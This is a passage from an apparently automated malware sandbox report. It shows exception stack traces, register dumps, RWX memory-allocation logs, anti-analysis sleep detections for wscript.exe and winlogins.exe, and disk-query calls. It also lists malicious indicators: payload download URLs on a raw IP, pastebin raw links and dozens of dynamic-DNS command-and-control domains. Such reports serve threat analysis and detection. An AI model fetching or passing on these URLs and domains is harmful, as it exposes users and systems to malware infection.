RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 43312208
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 43318160
registers.r11: 43313968
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1976344978
registers.r13: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 49210560
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 49216512
registers.r11: 49212320
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1974910188
registers.r13: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://54.254.238.33/xm/win.com
suspicious_features Connection to IP address suspicious_request GET http://54.254.238.33/xm/64a1.com
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/nEZ87Pwx
domain niogem1171.ddns.net
domain muslada2251.ddns.net
domain rinot972.ddns.net
domain marena9201.ddns.net
domain muslada2251.myvnc.com
domain niogem1171.myvnc.com
domain muslada2251.servebeer.com
domain niogem1171.servebeer.com
domain niogem1171.serveminecraft.net
domain muslada2251.serveminecraft.net
domain muslada2251.serveblog.net
domain niogem1171.serveblog.net
domain niogem1171.servecounterstrike.com
domain muslada2251.servecounterstrike.com
domain muslada2251.servehttp.com
domain niogem1171.servehttp.com
domain marena9201.bounceme.net
domain niogem1171.bounceme.net
domain muslada2251.bounceme.net
domain muslada2251.servequake.com
domain niogem1171.servequake.com
domain marena9201.3utilities.com
domain niogem1171.3utilities.com
domain muslada2251.3utilities.com
domain muslada2251.redirectme.net
domain niogem1171.redirectme.net
domain muslada2251.servehalflife.com
domain niogem1171.servehalflife.com
domain niogem1171.zapto.org
domain muslada2251.zapto.org
domain muslada2251.hopto.org
domain niogem1171.hopto.org
domain muslada2251.sytes.net
domain niogem1171.sytes.net
domain niogem1171.serveftp.com
domain muslada2251.serveftp.com
domain niogem1171.servemp3.com
domain muslada2251.servemp3.com
domain muslada2251.myftp.org
domain muslada2251.myftp.biz
domain niogem1171.myftp.biz
domain niogem1171.myftp.org
domain niogem1171.servegame.com
domain muslada2251.servegame.com
domain rinot972.ddnsking.com
domain niogem1171.ddnsking.com
domain marena9201.ddnsking.com
domain muslada2251.ddnsking.com
request GET http://54.254.238.33/xm/win.com
request GET http://54.254.238.33/xm/64a1.com
request GET https://pastebin.com/raw/GUqDzHQW
request GET https://pastebin.com/raw/h6SvjTQp
request GET https://pastebin.com/raw/DVn2TV4Q
request GET https://pastebin.com/raw/nEZ87Pwx
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x739f2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74032000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000746e3000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1664
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000746e3000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000746e3000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000746e3000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2860
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00540000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2964
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2964
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a12000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a50000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00552000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00585000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00587000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2964
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000708e3000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2940
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007391c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a12000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00590000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2256
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00415000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
description winlogins.exe tried to sleep 219 seconds, actually delayed analysis time by 219 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3348101
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347586
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347586
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347586
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347578
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347578
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 1246528
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343470
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347837
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347586
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3347586
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343574
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343472
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343470
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343470
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3343436
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
